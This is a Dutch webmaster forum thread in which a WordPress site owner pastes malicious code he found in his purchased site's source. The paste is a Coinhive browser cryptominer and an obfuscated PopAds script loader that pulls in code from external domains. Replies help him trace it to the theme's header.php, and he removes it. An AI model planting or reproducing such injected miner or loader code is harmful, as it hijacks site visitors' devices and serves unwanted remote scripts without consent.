Hi,
Ik heb een nieuwe Wordpress website.
Deze toont continue popups bij activiteit op de website.
Alle plugins nagekeken, en 1 popup plugin is verwijdert.
Toch blijft het probleem zich voordoen.
Nadat ik de Broncode bekeken heb viel het me meteen op:
Volgensmij kan heel de code hierboven er vanaf.<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('iHoa5vNPGMU8nSyM1PwQZDtfNH2pDZ PL');
miner.start();
</script>
<!-- PopAds.net Popunder Code for www.site.com | 2018-03-20,1884127,0,0 -->
<script type="text/javascript" data-cfasync="false">
/*<![CDATA[/* */
/* Privet darkv. Each domain is 2h fox dead */
(function(){ var w=window;w["\x5f\u0070op"]=[["\u0073\u0069\u0074e\x49\x64",1884127],["\x6di\u006e\x42\u0069d",0],["\u0070\u006fpu\x6ede\u0072s\x50e\u0072\x49\x5 0",0],["del\x61\x79B\x65\x74w\x65e\x6e",120],["\u0064\x65\u0066a\u0075\u006c\u0074",false],["d\u0065\x66\x61\x75l\u0074\u0050\x65\x72D\u0061\u 0079",0],["to\x70\x6d\u006fs\u0074\x4c\u0061\u0079e\u0072",! 0]];var e=["/\x2fc\u0031.\x70\u006fp\x61\u0064\u0073\x2e\u006e\ u0065\u0074\x2f\u0070\x6f\x70.\x6a\x73","/\x2f\x63\x32\x2e\x70\u006f\x70a\u0064\x73\x2ene\x7 4/\x70\x6f\x70.\u006as","\x2f/\x77ww\u002e\u0070\x6f\u0061\x78\u0075po\x71bw\x2e \u0063o\u006d\x2fg.j\x73","/\u002fw\x77w\u002e\u0076n\u006byd\u0068\u006e\u007 9j\x65\x64\u002ecom\u002f\u0069\u006a\x6c\x79.\x6a s",""],q=0,g,c=function(){if(""==e[q])return;g=w["\x64o\x63\u0075\x6d\u0065\u006et"]["\u0063\x72\u0065at\x65\x45\x6c\x65\x6d\u0065n\u00 74"]("s\u0063\x72ip\x74");g["t\x79p\u0065"]="\x74\x65\u0078\x74/ja\u0076a\x73\x63\u0072\x69\u0070\u0074";g["as\u0079n\x63"]=!0;var s=w["\u0064\u006f\u0063\x75\u006d\x65\x6et"]["getE\u006c\x65\u006de\u006e\x74s\u0042\x79\u0054\ u0061\x67N\u0061\u006de"]("\x73\u0063\u0072\x69\x70\u0074")[0];g["\x73\u0072\u0063"]=e[q];if(q<2){g["\u0063\u0072\x6fss\x4f\x72\x69\x67\u0069n"]="\x61\u006e\u006f\u006ey\x6d\x6f\u0075\u0073"; };g["\x6fner\x72or"]=function(){q++;c()};s["p\u0061\u0072en\u0074\u004eo\u0064e"]["in\x73e\x72tBe\u0066\x6f\x72e"](g,s)};c()})();
/*]]>/* */
</script>
Echter heb ik geen idee in welk bestand ik deze zou moeten kunnen vinden.
Iemand een idee?
Groet,
Peter
-
25-01-2019, 10:56 #1
i-Reach
- Berichten
- 388
- Lid sinds
- 18 Jaar
Spammy code verwijderen
-
-
25-01-2019, 11:32 #2
Particulier
- Berichten
- 410
- Lid sinds
- 10 Jaar
Re: Spammy code verwijderen
Middag,
om welke site gaat het?
Groeten Ron
-
25-01-2019, 11:59 #3
i-Reach
- Berichten
- 388
- Lid sinds
- 18 Jaar
Re: Spammy code verwijderen
Ik post de site liever niet op het forum, zie PB Ronnie.
-
25-01-2019, 14:14 #4
Particulier
- Berichten
- 487
- Lid sinds
- 15 Jaar
Re: Spammy code verwijderen
In je thema even je functions.php of footer.php nakijken, is dit na installatie gebeurd of staat de website zelf al live voor bezoekers?
-
25-01-2019, 14:19 #5
i-Reach
- Berichten
- 388
- Lid sinds
- 18 Jaar
Re: Spammy code verwijderen
Ik heb de website zo gekocht, en staat dus live voor de bezoekers.
Het lijkt erop dat dit al maanden het geval is.
Zal beide bestanden nog eens dubbel checken.
-
25-01-2019, 14:38 #6
i-Reach
- Berichten
- 388
- Lid sinds
- 18 Jaar
Re: Spammy code verwijderen
In functions.php kon ik niks vinden.
footer.php stond nog wel een link naar een popup pagina.
In het geactiveerde thema stond in de header.php bovenaan gewoon heel de code vermeld:)
Deze heb ik eruit gehaald.
Wachtwoorden van WP Admin en Hosting zijn aangepast.
Hopelijk is het nu opgelost.
Iedereen dank voor de reacties (ook via PB)!
Groet,
Peter
-
25-01-2019, 14:45 #7
Particulier
- Berichten
- 410
- Lid sinds
- 10 Jaar
Re: Spammy code verwijderen
Graag gedaan Peter.
Fijn weekend.
Groeten Ron
